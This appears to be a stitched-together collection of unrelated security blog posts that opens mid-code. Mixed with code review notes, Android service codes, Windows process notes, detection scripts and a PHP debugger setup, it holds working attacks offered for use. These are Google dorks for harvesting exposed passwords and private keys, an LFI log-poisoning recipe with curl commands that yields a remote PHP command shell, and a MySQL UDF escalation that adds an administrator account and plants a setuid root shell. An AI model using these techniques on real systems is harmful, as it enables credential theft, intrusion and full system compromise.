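            return False
        acct = self.accounts[username]
        if acct.failed_logins >= LOCK_THRESHOLD:
            return False                         # lockout enforced per request, not only at login
        return acct.privilege == needed


def replay_steps() -> dict:
    """Run steps 1-4 from the write-up against both patterns and report who is fooled."""
    server = Server({"test": Account(password="correct horse", privilege="N")})
    for _ in range(LOCK_THRESHOLD):              # step 1: lock the account
        server.login("test", "wrong")
    body, token = server.login("test", "random") # step 2: any password
    fresh = Server({"test": Account(password="pw", privilege="N")})
    _, good_token = fresh.login("test", "pw")
    return {
        "reply_is_locked": not parse_login_response(body)["ok"],
        "client_trusting_body": vulnerable_client_decision(FORGED_BODY),  # "N": fooled
        "server_side_check": server.authorize(token, "N"),                # False: no session
        "legitimate_session": fresh.authorize(good_token, "N"),           # True
    }
```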

5 Vulnerabilities That Surely Need a Source Code Review


Approach for Source Code Review


The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps:

Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)

A security weakness is an insecure practice or a dangerous API call or an insecure design. Some examples of weaknesses are:
  • Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";
  • Dangerous or risky API call such as RunTime.exec, Statement.execute
  • Insecure Design such as using only MD5 hashing of passwords without any salt.

Correlation between Security Weakness and Dynamic Input

Dynamic construction of an SQL query without the necessary validation or sanitization is definitely a security weakness; however, it may not lead to a security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with a user input and reach a possibly weak or risky code block. Skipping this phase will leave a huge number of false positives in the results.

This step generally involves enumerating sources and finding a path from source to sink. A source in this case is any user-controlled and untrusted input, e.g. HTTP request parameters, cookies, uploaded file contents, etc.

Using Google.com to find Usernames and Passwords

Method 1: Facebook!
We will be using a Google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_test= email= default_persistent=
Enter that into Google, and you will be presented with several sites that have username and password lists!


Method 2: WordPress!

This will look for WordPress backup files, which contain the passwords and all data for the site!
The Dork: filetype:sql inurl:wp-content/backup-*

Method 3: WWWBoard!

This will look for the usernames and passwords of WWWBoard users
The Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.
The Dork: ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

Method 5: Symfony!
This finds database information and logins
The Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository

Method 6: TeamSpeak! (big one!!!!!)
This will search for the server.dbs file (an SQLite database file with the SuperAdmin username and password!!!)
The Dork: server-dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)
This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"
The Dork: "inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!
Simple dork which looks for all types of admin info
The Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!)
This will find any .pem files which contain private keys.
The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords....
Method 10: The Dir of Passwords!
Simple one!
The Dork: intitle:"Index of..etc" passwd

Enjoy! ;)

Remote Shell PHP via LFI

1. Find the LFI vulnerability in website

2. Inject the web shell into the log file via the User-Agent or X-Forwarded-For header, or anything else the logger records.
# curl -s -A '' 'http://target.com/' -o /dev/null

3. Once the web shell is injected, try using it with any command such as id, pwd, ls
# curl -s 'http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=id'

4. Now you're ready to get a remote shell that behaves as if you were interacting directly with target.com's shell. (Run this in our shell)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=$cmd" ; done

5. Now you browse to "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=" and send commands continuously, as if you were on target.com
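As an added detection example (not from the original post), this Python scans Apache combined-format log lines for the two halves of the technique above: a PHP open tag planted in a request field, and a traversal include that reaches a log file, then correlates both from one client. The log lines, IPs and paths are constructed, and the planted tag is an inert echo.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

PHP_TAG = re.compile(r"<\?(php\b|=)", re.I)     # a PHP open tag has no business in a request
TRAVERSAL = re.compile(r"\.\.[/\\]")             # checked after URL-decoding
LOG_TARGET = re.compile(r"/var/log/|access\.log|error\.log|/proc/self/environ", re.I)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry looks like log poisoning or LFI, in a fixed order."""
    reasons = []
    for field in ("request", "referer", "agent"):
        if PHP_TAG.search(unquote(entry[field])):
            reasons.append(f"php-tag-in-{field}")
    request = unquote(entry["request"])
    if TRAVERSAL.search(request):
        reasons.append("path-traversal")
        if LOG_TARGET.search(request):
            reasons.append("traversal-to-log-file")
    return reasons


def scan(lines: List[str]) -> List[dict]:
    alerts = []
    for number, line in enumerate(lines, 1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            alerts.append({"line": number, "ip": entry["ip"], "reasons": reasons})
    return alerts


def correlate(alerts: List[dict]) -> List[str]:
    """IPs that first planted a PHP tag and later pulled a log file through the include:
    that pairing is the chain from steps 2 and 3, not just a noisy scanner."""
    planted, chained = set(), set()
    for a in alerts:                       # alerts are in log order
        if any(r.startswith("php-tag-in-") for r in a["reasons"]):
            planted.add(a["ip"])
        if "traversal-to-log-file" in a["reasons"] and a["ip"] in planted:
            chained.add(a["ip"])
    return sorted(chained)


# Constructed sample log; the planted tag is an inert echo, not a shell.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Nov/2014:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Nov/2014:10:05:11 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '198.51.100.7 - - [22/Nov/2014:10:05:40 +0000] "GET /include.php?page=../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 4096 "-" "curl/7.38.0"',
    '203.0.113.9 - - [22/Nov/2014:10:07:00 +0000] "GET /include.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 900 "-" "curl/7.38.0"',
]


def scan_sample() -> List[dict]:
    return scan(SAMPLE_LOG)
```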

Hidden Secret Codes for all Android Devices [LATEST]

One of the most popular practices amongst software developers is to leave ‘backdoors’ within the code, which essentially allow anyone with knowledge to get into the system at a much deeper level than you’d expect from an end-user. These backdoors aren’t always with a malicious intent; most of the time, they allow the OEM or programmer to get into the system for troubleshooting when other, usual modes of access have been blocked. They can be quite friendly and helpful if you know what you’re doing.
Smartphones have a good share of these as well, where they’re generally known as secret codes. Most of the time, these numeric/symbolic sequences allow you to access hidden menus, diagnostic tests, areas that could change some of the most basic parameters of your device and whatnot. These secret codes, in fact, have not been exclusive to smartphones, but have long been a part of the dumb-phones and then the feature-phones before most major OEMs joined the smartphone bandwagon. For those devices that run Android, certain codes are shared across the board, and hence, can be used on a variety of devices.

What follows is a collection of some of the secret codes common to the Android platform. All of these would be entered through the phone dialer (just punch in the sequence as shown). Since most hidden menus are manufacturer specific, there’s no guarantee that they’ll work across all Android smartphones, but you can try them out nevertheless on your Samsung, HTC, Motorola, Sony and other devices. Be advised, though, that some of these can cause serious changes to your device’s configuration, so don’t play with something that you don’t fully understand.

*#06# – IMEI number

*#0*# – Enter the service menu on newer phones like Galaxy S III

*#*#4636#*#* – Phone information, usage statistics and battery

*#*#34971539#*#* – Detailed camera information

*#*#273282*255*663282*#*#* – Immediate backup of all media files

*#*#197328640#*#* – Enable test mode for service

*#*#232339#*#* – Wireless LAN tests

*#*#0842#*#* – Backlight/vibration test

*#*#2664#*#* – Test the touchscreen

*#*#1111#*#* – FTA software version (1234 in the same code will give PDA and firmware version)

*#12580*369# – Software and hardware info

*#9090# – Diagnostic configuration

*#872564# – USB logging control

*#9900# – System dump mode
*#301279# – HSDPA/HSUPA Control Menu

*#7465625# – View phone lock status

*#*#7780#*#* – Reset the /data partition to factory state

*2767*3855# – Format device to factory state (will delete everything on phone)

##7764726 – Hidden service menu for Motorola Droid


Update x1: More codes!

*#*#7594#*#* – Enable direct powering down of device once this code is entered

*#*#273283*255*663282*#*#* – Make a quick backup of all the media files on your Android device

*#*#232338#*#* – Shows Wi-Fi MAC address

*#*#1472365#*#* – Perform a quick GPS test

*#*#1575#*#* – For a more advanced GPS test

*#*#0283#*#* – Perform a packet loopback test

*#*#0*#*#* – Run an LCD display test

*#*#0289#*#* – Run Audio test

*#*#2663#*#* – Show device’s touch-screen version

*#*#0588#*#* – Perform a proximity sensor test

*#*#3264#*#* – Show RAM version
*#*#232331#*#* – Run Bluetooth test

*#*#232337#*# – Show device’s Bluetooth address

*#*#7262626#*#* – Perform a field test

*#*#8255#*#* – Monitor Google Talk service

*#*#4986*2650468#*#* – Show Phone, Hardware, PDA, RF Call Date firmware info

*#*#1234#*#* – Show PDA and Phone firmware info

*#*#2222#*#* – Show FTA Hardware version

*#*#44336#*#* – Show Build time and change list number

*#*#8351#*#* – Enable voice dialling log mode, dial *#*#8350#*#* to disable it

##778 (+call) – Show EPST menu

-------------------------------------------------------------------
Codes specific to HTC devices only:

*#*#3424#*#* – Run HTC function test program

*#*#4636#*#* – Show HTC info menu
##8626337# – Run VOCODER

##33284# – Perform field test

*#*#8255#*#* – Launch Google Talk service monitor

##3424# – Run diagnostic mode
##3282# – Show EPST menu

##786# – Reverse Logistics Support
Note: Not all codes are supported in a phone. Try these codes at your own risk.

Details of Windows Processes


Idle and System
  • Created by ntoskrnl.exe via the process manager function, which creates and terminates processes and threads.
  • No visible parent processes
  • System has a static PID of 4
  • System creates smss.exe
  • There should only be one system process running
SMSS – Session Manager
  • First user mode process
  • Parent process is System
  • Base Priority of 11
  • Username: NT AUTHORITY\SYSTEM
  • Performs delayed file delete/rename changes
  • Loads known dlls
  • Runs from %systemroot%\System32\smss.exe
  • Creates session 0 (OS services)
  • Creates session 1 (User session)
  • Creates csrss and winlogon then exits, which is why they have no parent process and they both have session ids of 1
  • Runs within session 0
  • Only one smss.exe process should be running at one time. The second smss.exe process exits, so you will only see the one running in session 0.
  • There can be more sessions if more users are logged on to the system. 0 and 1 are for a single user logged onto the system.
CSRSS.EXE – Client/Server Run
  • Windows subsystem process.
  • Base Priority of 13
  • %SystemRoot%\system32\csrss.exe
  • Username: NT AUTHORITY\SYSTEM
  • Creates/Deletes processes and threads, Temp files, etc.
  • In XP it's used to draw text-based console windows. Under Windows 7, the conhost process now provides that functionality (for example, for cmd.exe)
  • One csrss process per session
  • Its name is often used by malware to hide on systems (CSSRS.EXE, CSRSSS.EXE, etc.)
  • Runs within session 0
WININIT.EXE – Windows Initialization Process
  • Parent to services.exe (SCM), lsass.exe and lsm.exe
  • Created by smss.exe, but since smss.exe exits there is no parent to WININIT.
  • Base Priority of 13
  • Username: NT AUTHORITY\SYSTEM
  • %SystemRoot%\system32\wininit.exe
  • Performs user-mode initialization tasks
  • Creates %windir%\temp
  • Runs within session 0
SERVICES.EXE – Service Control Manager
  • Child to WININIT.EXE
  • Parent to services such as svchost.exe, dllhost.exe, taskhost.exe, spoolsv.exe, etc. Services are defined in SYSTEM\CurrentControlSet\Services
  • %SystemRoot%\System32\wininit.exe
  • Username: NT AUTHORITY\SYSTEM
  • Base Priority of 9
  • Loads a database of services into memory
  • Runs within session 0
  • There should only be one services.exe process running
LSASS.EXE – Local Security Authority
  • Child to WININIT.EXE
  • Only one lsass.exe process
  • %SystemRoot%\System32\lsass.exe
  • Responsible for local security policy to include managing users allowed to login, password policies, writing to the security event log, etc.
  • Often targeted by malware as a means to dump passwords. Also mimicked by malware to hide on a system (lass.exe, lssass.exe, lsasss.exe, etc.). These “fake” names will not be children of wininit.exe.
  • Base Priority of 9
  • Username: NT AUTHORITY\SYSTEM
  • Runs within session 0
  • It should not have child processes
SVCHOST.EXE – Service Hosting Process
  • Multiple instances of svchost.exe can/do exist/run
  • %SystemRoot%\System32\svchost.exe
  • Username: Should only be one of three options: NT AUTHORITY\SYSTEM, LOCAL SERVICE, or NETWORK SERVICE
  • Should always have a parent of services.exe
  • Base Priority of 8
  • Often mimicked (scvhost, svch0st, etc.). When they are mimicked they will not be running as children of services.exe.
  • Command Line: svchost.exe -k
  • -k values should exist within the Software\Microsoft\Windows NT\CurrentVersion\Svchost registry key
  • Often, when malware uses the actual svchost.exe to load its malicious service, it will not include -k command line parameters and will be running under a username that does not match one of the three listed in bullet 3.
  • They should all be running within session 0
LSM.EXE – Load Session Manager Service
  • Manages the state of terminal server sessions on the local machine. Sends the requests to smss.exe to start new sessions.
  • Child to wininit.exe
  • It should not have child processes
  • Receives logon/off, shell start and termination, connect/disconnects from a session, and lock/unlock desktop
  • I have not personally seen malware try and impersonate LSM.exe, but there is always a first so keep your eyes open.
  • %systemroot%\System32\lsm.exe
  • Base Priority of 8
  • Username: NT AUTHORITY\SYSTEM
  • Runs within session 0
WINLOGON.EXE – Windows Logon Process
  • No parent process
  • Could have a child process of LogonUI if smartcard, etc. are used to authenticate
  • LogonUI will terminate once the user enters their password. Once password is entered the verification is sent over to LSASS and it’s verified via Active Directory or SAM (the registry hive SAM), which stores local users and group information.
  • Base Priority of 13
  • Runs within session one
  • Handles interactive user logons/logoffs when SAS keystroke combination is entered (Ctrl+Alt+Delete)
  • Loads Userinit within Software\Microsoft\Windows NT\CurrentVersion\Winlogon
  • The userinit value in the registry should be: Userinit.exe, (note the comma). Malware will sometimes add additional values to this key, which will load malware upon successful logons.
  • Userinit.exe exits once it runs so you won't see this process running when you look.
  • Userinit initializes the user environment. This includes running GPOs and logon scripts.
  • Will run Shell value located at Software\Microsoft\Windows NT\CurrentVersion\Winlogon within the registry. The value of shell should be Explorer.exe. Malware will also use this sometimes to execute malware by adding values.
  • Since Userinit exits, this is also why Explorer.exe doesn’t have a parent process.
Explorer.exe – AKA Windows Explorer
  • No parent process since Userinit.exe exits
  • The value “Explorer.exe” is stored in shell value within the registry. The registry location is here: Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
  • Base Priority of 8
  • Username: The logged on user account.
  • %Systemroot%\Explorer.exe
  • This will contain multiple child processes.
  • Some of you might know this better as, “Windows Explorer”
  • This process is often targeted by malware. Malware will often times inject this process. One indication of this is if Explorer.exe is connecting out to the internet. There are other indicators, but that’s another post. We are keeping it simple here.
Let’s sum this post up by creating a simple checklist to review while looking for malicious/suspect process activity.
  • Check the parent/child relationships of processes.
  • Check which user names the processes are running under
  • Check their command line parameters for those processes that use them.
  • Check their digital signatures
  • Check their base priorities
  • Check the location they are being run from
  • Check their spellings
  • Leverage memory analysis to detect hidden and/or injected process. Some malware can hide processes by unlinking them (among other ways). Memory analysis is a must these days.
  • When you get comfortable with everything here, dig deeper and check what modules are typically loaded for each process.
  • Check that processes that should not be connecting out to the internet are not doing so
  • Check process privileges
  • If wscript.exe process is running check the command line of what it is running.
  • Investigate processes running inside %temp%, root of %appdata%, %localappdata%, recycle bin, etc.
  • If rundll32.exe is running check its command line as well.
  • “Most” legitimate user applications like Adobe, Web browsers, etc. don’t spawn child processes like cmd.exe. If you see this, they should be investigated.
  • Core Windows processes shouldn’t be communicating out to the internet. If you see communication from these processes, dig deeper. Look for suspicious URLs/IPs, check process strings, etc.
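The checklist above turned into an added Python audit over a constructed process snapshot (not the author's tooling): expected parents, users, paths and session numbers are the ones stated in the notes above, and name look-alikes are caught with a one-edit distance. The snapshot's PIDs, the user CORP\alice and the file paths are constructed.

```python
from collections import Counter
from dataclasses import dataclass
from typing import List, Tuple

SYSTEM = "NT AUTHORITY\\SYSTEM"
SVCHOST_USERS = {SYSTEM, "NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\NETWORK SERVICE"}
S32 = "C:\\Windows\\System32\\"
# name -> (expected parent, expected user or None, expected directory, expected session or None)
RULES = {
    "smss.exe": ("system", SYSTEM, S32, 0),
    "csrss.exe": (None, SYSTEM, S32, None),          # creator smss exited; one per session
    "wininit.exe": (None, SYSTEM, S32, 0),
    "services.exe": ("wininit.exe", SYSTEM, S32, 0),
    "lsass.exe": ("wininit.exe", SYSTEM, S32, 0),
    "lsm.exe": ("wininit.exe", SYSTEM, S32, 0),
    "svchost.exe": ("services.exe", None, S32, 0),   # user checked against SVCHOST_USERS
    "winlogon.exe": (None, None, S32, None),
    "explorer.exe": (None, None, "C:\\Windows\\", None),  # userinit exited, so no parent
}
SINGLETONS = {"system", "smss.exe", "wininit.exe", "services.exe", "lsass.exe", "lsm.exe"}
NO_CHILDREN = {"lsass.exe", "lsm.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    user: str
    session: int
    path: str
    cmdline: str = ""


def osa_distance(a: str, b: str) -> int:
    """Edit distance that counts an adjacent swap as one edit, so both 'scvhost'
    and 'svch0st' sit one step from 'svchost'."""
    d = [[i if j == 0 else j if i == 0 else 0 for j in range(len(b) + 1)] for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def audit(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Apply the checklist to a snapshot; returns (pid, finding) pairs in snapshot order."""
    by_pid = {p.pid: p for p in procs}
    counts = Counter(p.name.lower() for p in procs)
    children = Counter(p.ppid for p in procs)
    findings: List[Tuple[int, str]] = []
    for p in procs:
        n = p.name.lower()
        hits = [(p.pid, code) for hit, code in (
            (n == "system" and p.pid != 4, "system-pid-not-4"),
            (n in SINGLETONS and counts[n] > 1, "duplicate-singleton"),
            (n in NO_CHILDREN and children[p.pid] > 0, "unexpected-children")) if hit]
        if n in RULES:
            exp_parent, exp_user, exp_dir, exp_session = RULES[n]
            parent = by_pid.get(p.ppid)
            pname = parent.name.lower() if parent else None
            allowed = SVCHOST_USERS if n == "svchost.exe" else (exp_user and {exp_user})
            hits += [(p.pid, code) for hit, code in (
                (pname != exp_parent, "unexpected-parent"),
                (allowed and p.user not in allowed, "unexpected-user"),
                (not p.path.lower().startswith(exp_dir.lower()), "unexpected-path"),
                (exp_session is not None and p.session != exp_session, "unexpected-session"),
                (n == "svchost.exe" and "-k" not in p.cmdline.split(), "svchost-missing-k")) if hit]
        else:  # not a core name: is it a misspelling of one?
            hits += [(p.pid, f"lookalike:{core}") for core in RULES if osa_distance(n, core) == 1][:1]
        findings.extend(hits)
    return findings


# Constructed snapshot: a healthy core set plus the anomalies the notes above warn about.
TEMP = "C:\\Users\\alice\\AppData\\Local\\Temp\\"
SAMPLE = [
    Proc(4, 0, "System", SYSTEM, 0, ""),
    Proc(300, 4, "smss.exe", SYSTEM, 0, S32 + "smss.exe"),
    Proc(380, 0, "csrss.exe", SYSTEM, 0, S32 + "csrss.exe"),
    Proc(420, 0, "wininit.exe", SYSTEM, 0, S32 + "wininit.exe"),
    Proc(520, 420, "services.exe", SYSTEM, 0, S32 + "services.exe"),
    Proc(528, 420, "lsass.exe", SYSTEM, 0, S32 + "lsass.exe"),
    Proc(700, 520, "svchost.exe", "NT AUTHORITY\\NETWORK SERVICE", 0, S32 + "svchost.exe",
         "svchost.exe -k NetworkService"),
    Proc(1500, 0, "explorer.exe", "CORP\\alice", 1, "C:\\Windows\\explorer.exe"),
    Proc(2100, 1500, "svch0st.exe", "CORP\\alice", 1, TEMP + "svch0st.exe"),   # look-alike name
    Proc(2200, 1500, "svchost.exe", "CORP\\alice", 1, TEMP + "svchost.exe", "svchost.exe"),
    Proc(2300, 528, "cmd.exe", SYSTEM, 0, S32 + "cmd.exe"),                     # child of lsass
]


def audit_sample() -> List[Tuple[int, str]]:
    return audit(SAMPLE)
```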

MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux

Once a MySQL database server has been compromised at root level, it’s often possible to escalate this access to full system level access using User Defined Functions (UDFs). We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.
Firstly, you’ll want to check out a copy of sqlmap. For this attack you’ll want to browse to the ‘udf’ directory and select the appropriate library depending on your target platform:
  1. udf/mysql/linux/32/lib_mysqludf_sys.so
  2. udf/mysql/linux/64/lib_mysqludf_sys.so
  3. udf/mysql/windows/32/lib_mysqludf_sys.dll
  4. udf/mysql/windows/64/lib_mysqludf_sys.dll
The steps for escalation on both Windows and Linux are the same. Firstly, we need to get a copy of the correct library on to the target machine in a known location – this could be by uploading to a user account we have access to, or uploading via a website image/file upload, or anonymous FTP account. The second step is issuing a SQL query to load this file in to a newly created table row.
Third, we dump that table row out to a new file in either the '/usr/lib' directory or the 'c:\windows\system32' directory, depending on whether we are on Linux or Windows respectively. We need to do this because our regular web application or user account does not have permission to create files in these directories, whereas the MySQL root user does. Next, we instruct MySQL to create a new function pointing to the code in our malicious library. Lastly, we execute this new function with the arbitrary system commands we wish to run.

MySQL on Windows Escalation
On windows, the process is as follows:
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");



MySQL on Linux Escalation
On Linux, the process is much the same, assuming we're logged in as user 'npn':

mysql> use mysql;
mysql> create table npn(line blob);
mysql> insert into npn values(load_file('/home/npn/lib_mysqludf_sys.so'));
mysql> select * from npn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
Now from our shell, we can cat /tmp/out:

npn@pwn:~$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
We can confirm that the commands we ran were executed as root. The easiest thing to do now is for user ‘npn’ to create and compile a simple setuid/system program under C:

#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
int main(void)
{
    setuid(0); setgid(0); system("/bin/bash");
    return 0;
}
We can compile this and place it in /tmp/ with:

gcc -o /tmp/shell /home/npn/shell.c
Finally, we can use our MySQL root account to set the setuid bit on the binary:

mysql> select sys_exec('chmod +s /tmp/shell');
User 'npn' can then execute /tmp/shell to gain a root shell:

npn@pwn:~$ /tmp/shell
root@pwn:/home/npn# cd ~/
root@pwn:~# id
uid=0(root) gid=0(root) groups=0(root)
root@pwn:~# ps
  PID TTY          TIME CMD
 1919 pts/1    00:00:00 bash
 2058 pts/1    00:00:00 ps
root@pwn:~#

Setup PHP Debugger with Sublime in Kali(Debian)


1. Install Sublime
# wget "http://c758482.r82.cf2.rackcdn.com/sublime-text_build-3065_amd64.deb"
# dpkg -i sublime-text_build-3065_amd64.deb

2. Run sublime
# cd /opt/sublime_text
# ./sublime_text

3. Install package control plugin. Open View -> Show Console
If you use Sublime2
"import urllib2,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler()) ); by = urllib2.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); open( os.path.join( ipp, pf), 'wb' ).write(by) if dh == h else None; print('Error validating download (got %s instead of %s), please try manual install' % (dh, h) if dh != h else 'Please restart Sublime Text to finish installation')"

If you use Sublime 3 (the version used in this post), paste this code and press Enter
"import urllib.request,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) "

4. Restart Sublime

5. Go to Preferences -> Package Control to install a package (plugin)

6. Type xdebug and install it

7. Install LAMP (Linux + Apache2 + MySQL + PHP) and the required software
#  apt-get install apache2 php5 php5-gd mysql-server php5-mysql php5-dev php-pear make python

8. Install Xdebug module for PHP5
# apt-get install php5-xdebug

Configure the xdebug module in /etc/php5/conf.d/20-xdebug.ini, filling it with these options
zend_extension=/usr/lib/php5/20100525/xdebug.so
xdebug.remote_enable=on
xdebug.remote_handler=dbgp
xdebug.remote_host=localhost
xdebug.remote_port=9000 


9. Restart Apache2
# /etc/init.d/apache2 restart

9. Create an example loop PHP file in Sublime
<?php
    $arr = array(1, 2, 3, 4);

    foreach ($arr as &$value)
    {
            $value = $value * 2;

            print $value;
    }
?>
 

10. In Sublime, create some breakpoints with right click and Xdebug -> Add/Remove Breakpoint.

11. In Sublime menu, Go to "Tools -> Xdebug -> Start Debugging"
(You can see the config of Sublime from "Tools -> Xdebug -> Settings Default(Or Settings User)")

12. Open Firefox

13. Install "The easiest Xdebug 2.0" addon

14. Restart Firefox

15. Go to "Tools -> Addon" and open the preferences of The easiest Xdebug 2.0

16. Input "sublime.xdebug" into IDE key for remote debugging.

17. Visit the page that we want to debug (the same page as step #9). Click the bug on the right side


18. Refresh it in the web browser; debugging begins and Sublime takes control of the page output.

List of PHP Exploitation Code

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
`` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program

PHP Code Execution

Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.
eval()
assert()  - identical to eval()
preg_replace('/.*/e',...) - /e does an eval() on the match
create_function()
include()
include_once()
require()
require_once()
$_GET['func_name']($_GET['argument']);
$func = new ReflectionFunction($_GET['func_name']); $func->invoke(); or $func->invokeArgs(array());

List of functions which accept callbacks

These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.
Function                     => Position of callback arguments
'ob_start'                   =>  0,
'array_diff_uassoc'          => -1,
'array_diff_ukey'            => -1,
'array_filter'               =>  1,
'array_intersect_uassoc'     => -1,
'array_intersect_ukey'       => -1,
'array_map'                  =>  0,
'array_reduce'               =>  1,
'array_udiff_assoc'          => -1,
'array_udiff_uassoc'         => array(-1, -2),
'array_udiff'                => -1,
'array_uintersect_assoc'     => -1,
'array_uintersect_uassoc'    => array(-1, -2),
'array_uintersect'           => -1,
'array_walk_recursive'       =>  1,
'array_walk'                 =>  1,
'assert_options'             =>  1,
'uasort'                     =>  1,
'uksort'                     =>  1,
'usort'                      =>  1,
'preg_replace_callback'      =>  1,
'spl_autoload_register'      =>  0,
'iterator_apply'             =>  1,
'call_user_func'             =>  0,
'call_user_func_array'       =>  0,
'register_shutdown_function' =>  0,
'register_tick_function'     =>  0,
'set_error_handler'          =>  0,
'set_exception_handler'      =>  0,
'session_set_save_handler'   => array(0, 1, 2, 3, 4, 5),
'sqlite_create_aggregate'    => array(2, 3),
'sqlite_create_function'     =>  2,

Information Disclosure

Most of these function calls are not sinks. Rather, they may become a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.
phpinfo
posix_mkfifo
posix_getlogin
posix_ttyname
getenv
get_current_user
proc_get_status
get_cfg_var
disk_free_space
disk_total_space
diskfreespace
getcwd
getlastmod
getmygid
getmyinode
getmypid
getmyuid

Other

extract - Opens the door for register_globals attacks (see study in scarlet).
parse_str - works like extract if only one argument is given.
putenv
ini_set
mail - has CRLF injection in the 3rd parameter, opens the door for spam.
header - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area.
proc_nice
proc_terminate
proc_close
pfsockopen
fsockopen
apache_child_terminate
posix_kill
posix_mkfifo
posix_setpgid
posix_setsid
posix_setuid

Filesystem Functions

According to RATS all filesystem functions in PHP are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance, if allow_url_fopen=On then a URL can be used as a file path, so a call to copy($_GET['s'], $_GET['d']); can be used to upload a PHP script anywhere on the system. Also, if a site is vulnerable to a request sent via GET, every one of those filesystem functions can be abused to channel an attack to another host through your server.
// open filesystem handler
fopen
tmpfile
bzopen
gzopen
SplFileObject->__construct
// write to filesystem (partially in combination with reading)
chgrp
chmod
chown
copy
file_put_contents
lchgrp
lchown
link
mkdir
move_uploaded_file
rename
rmdir
symlink
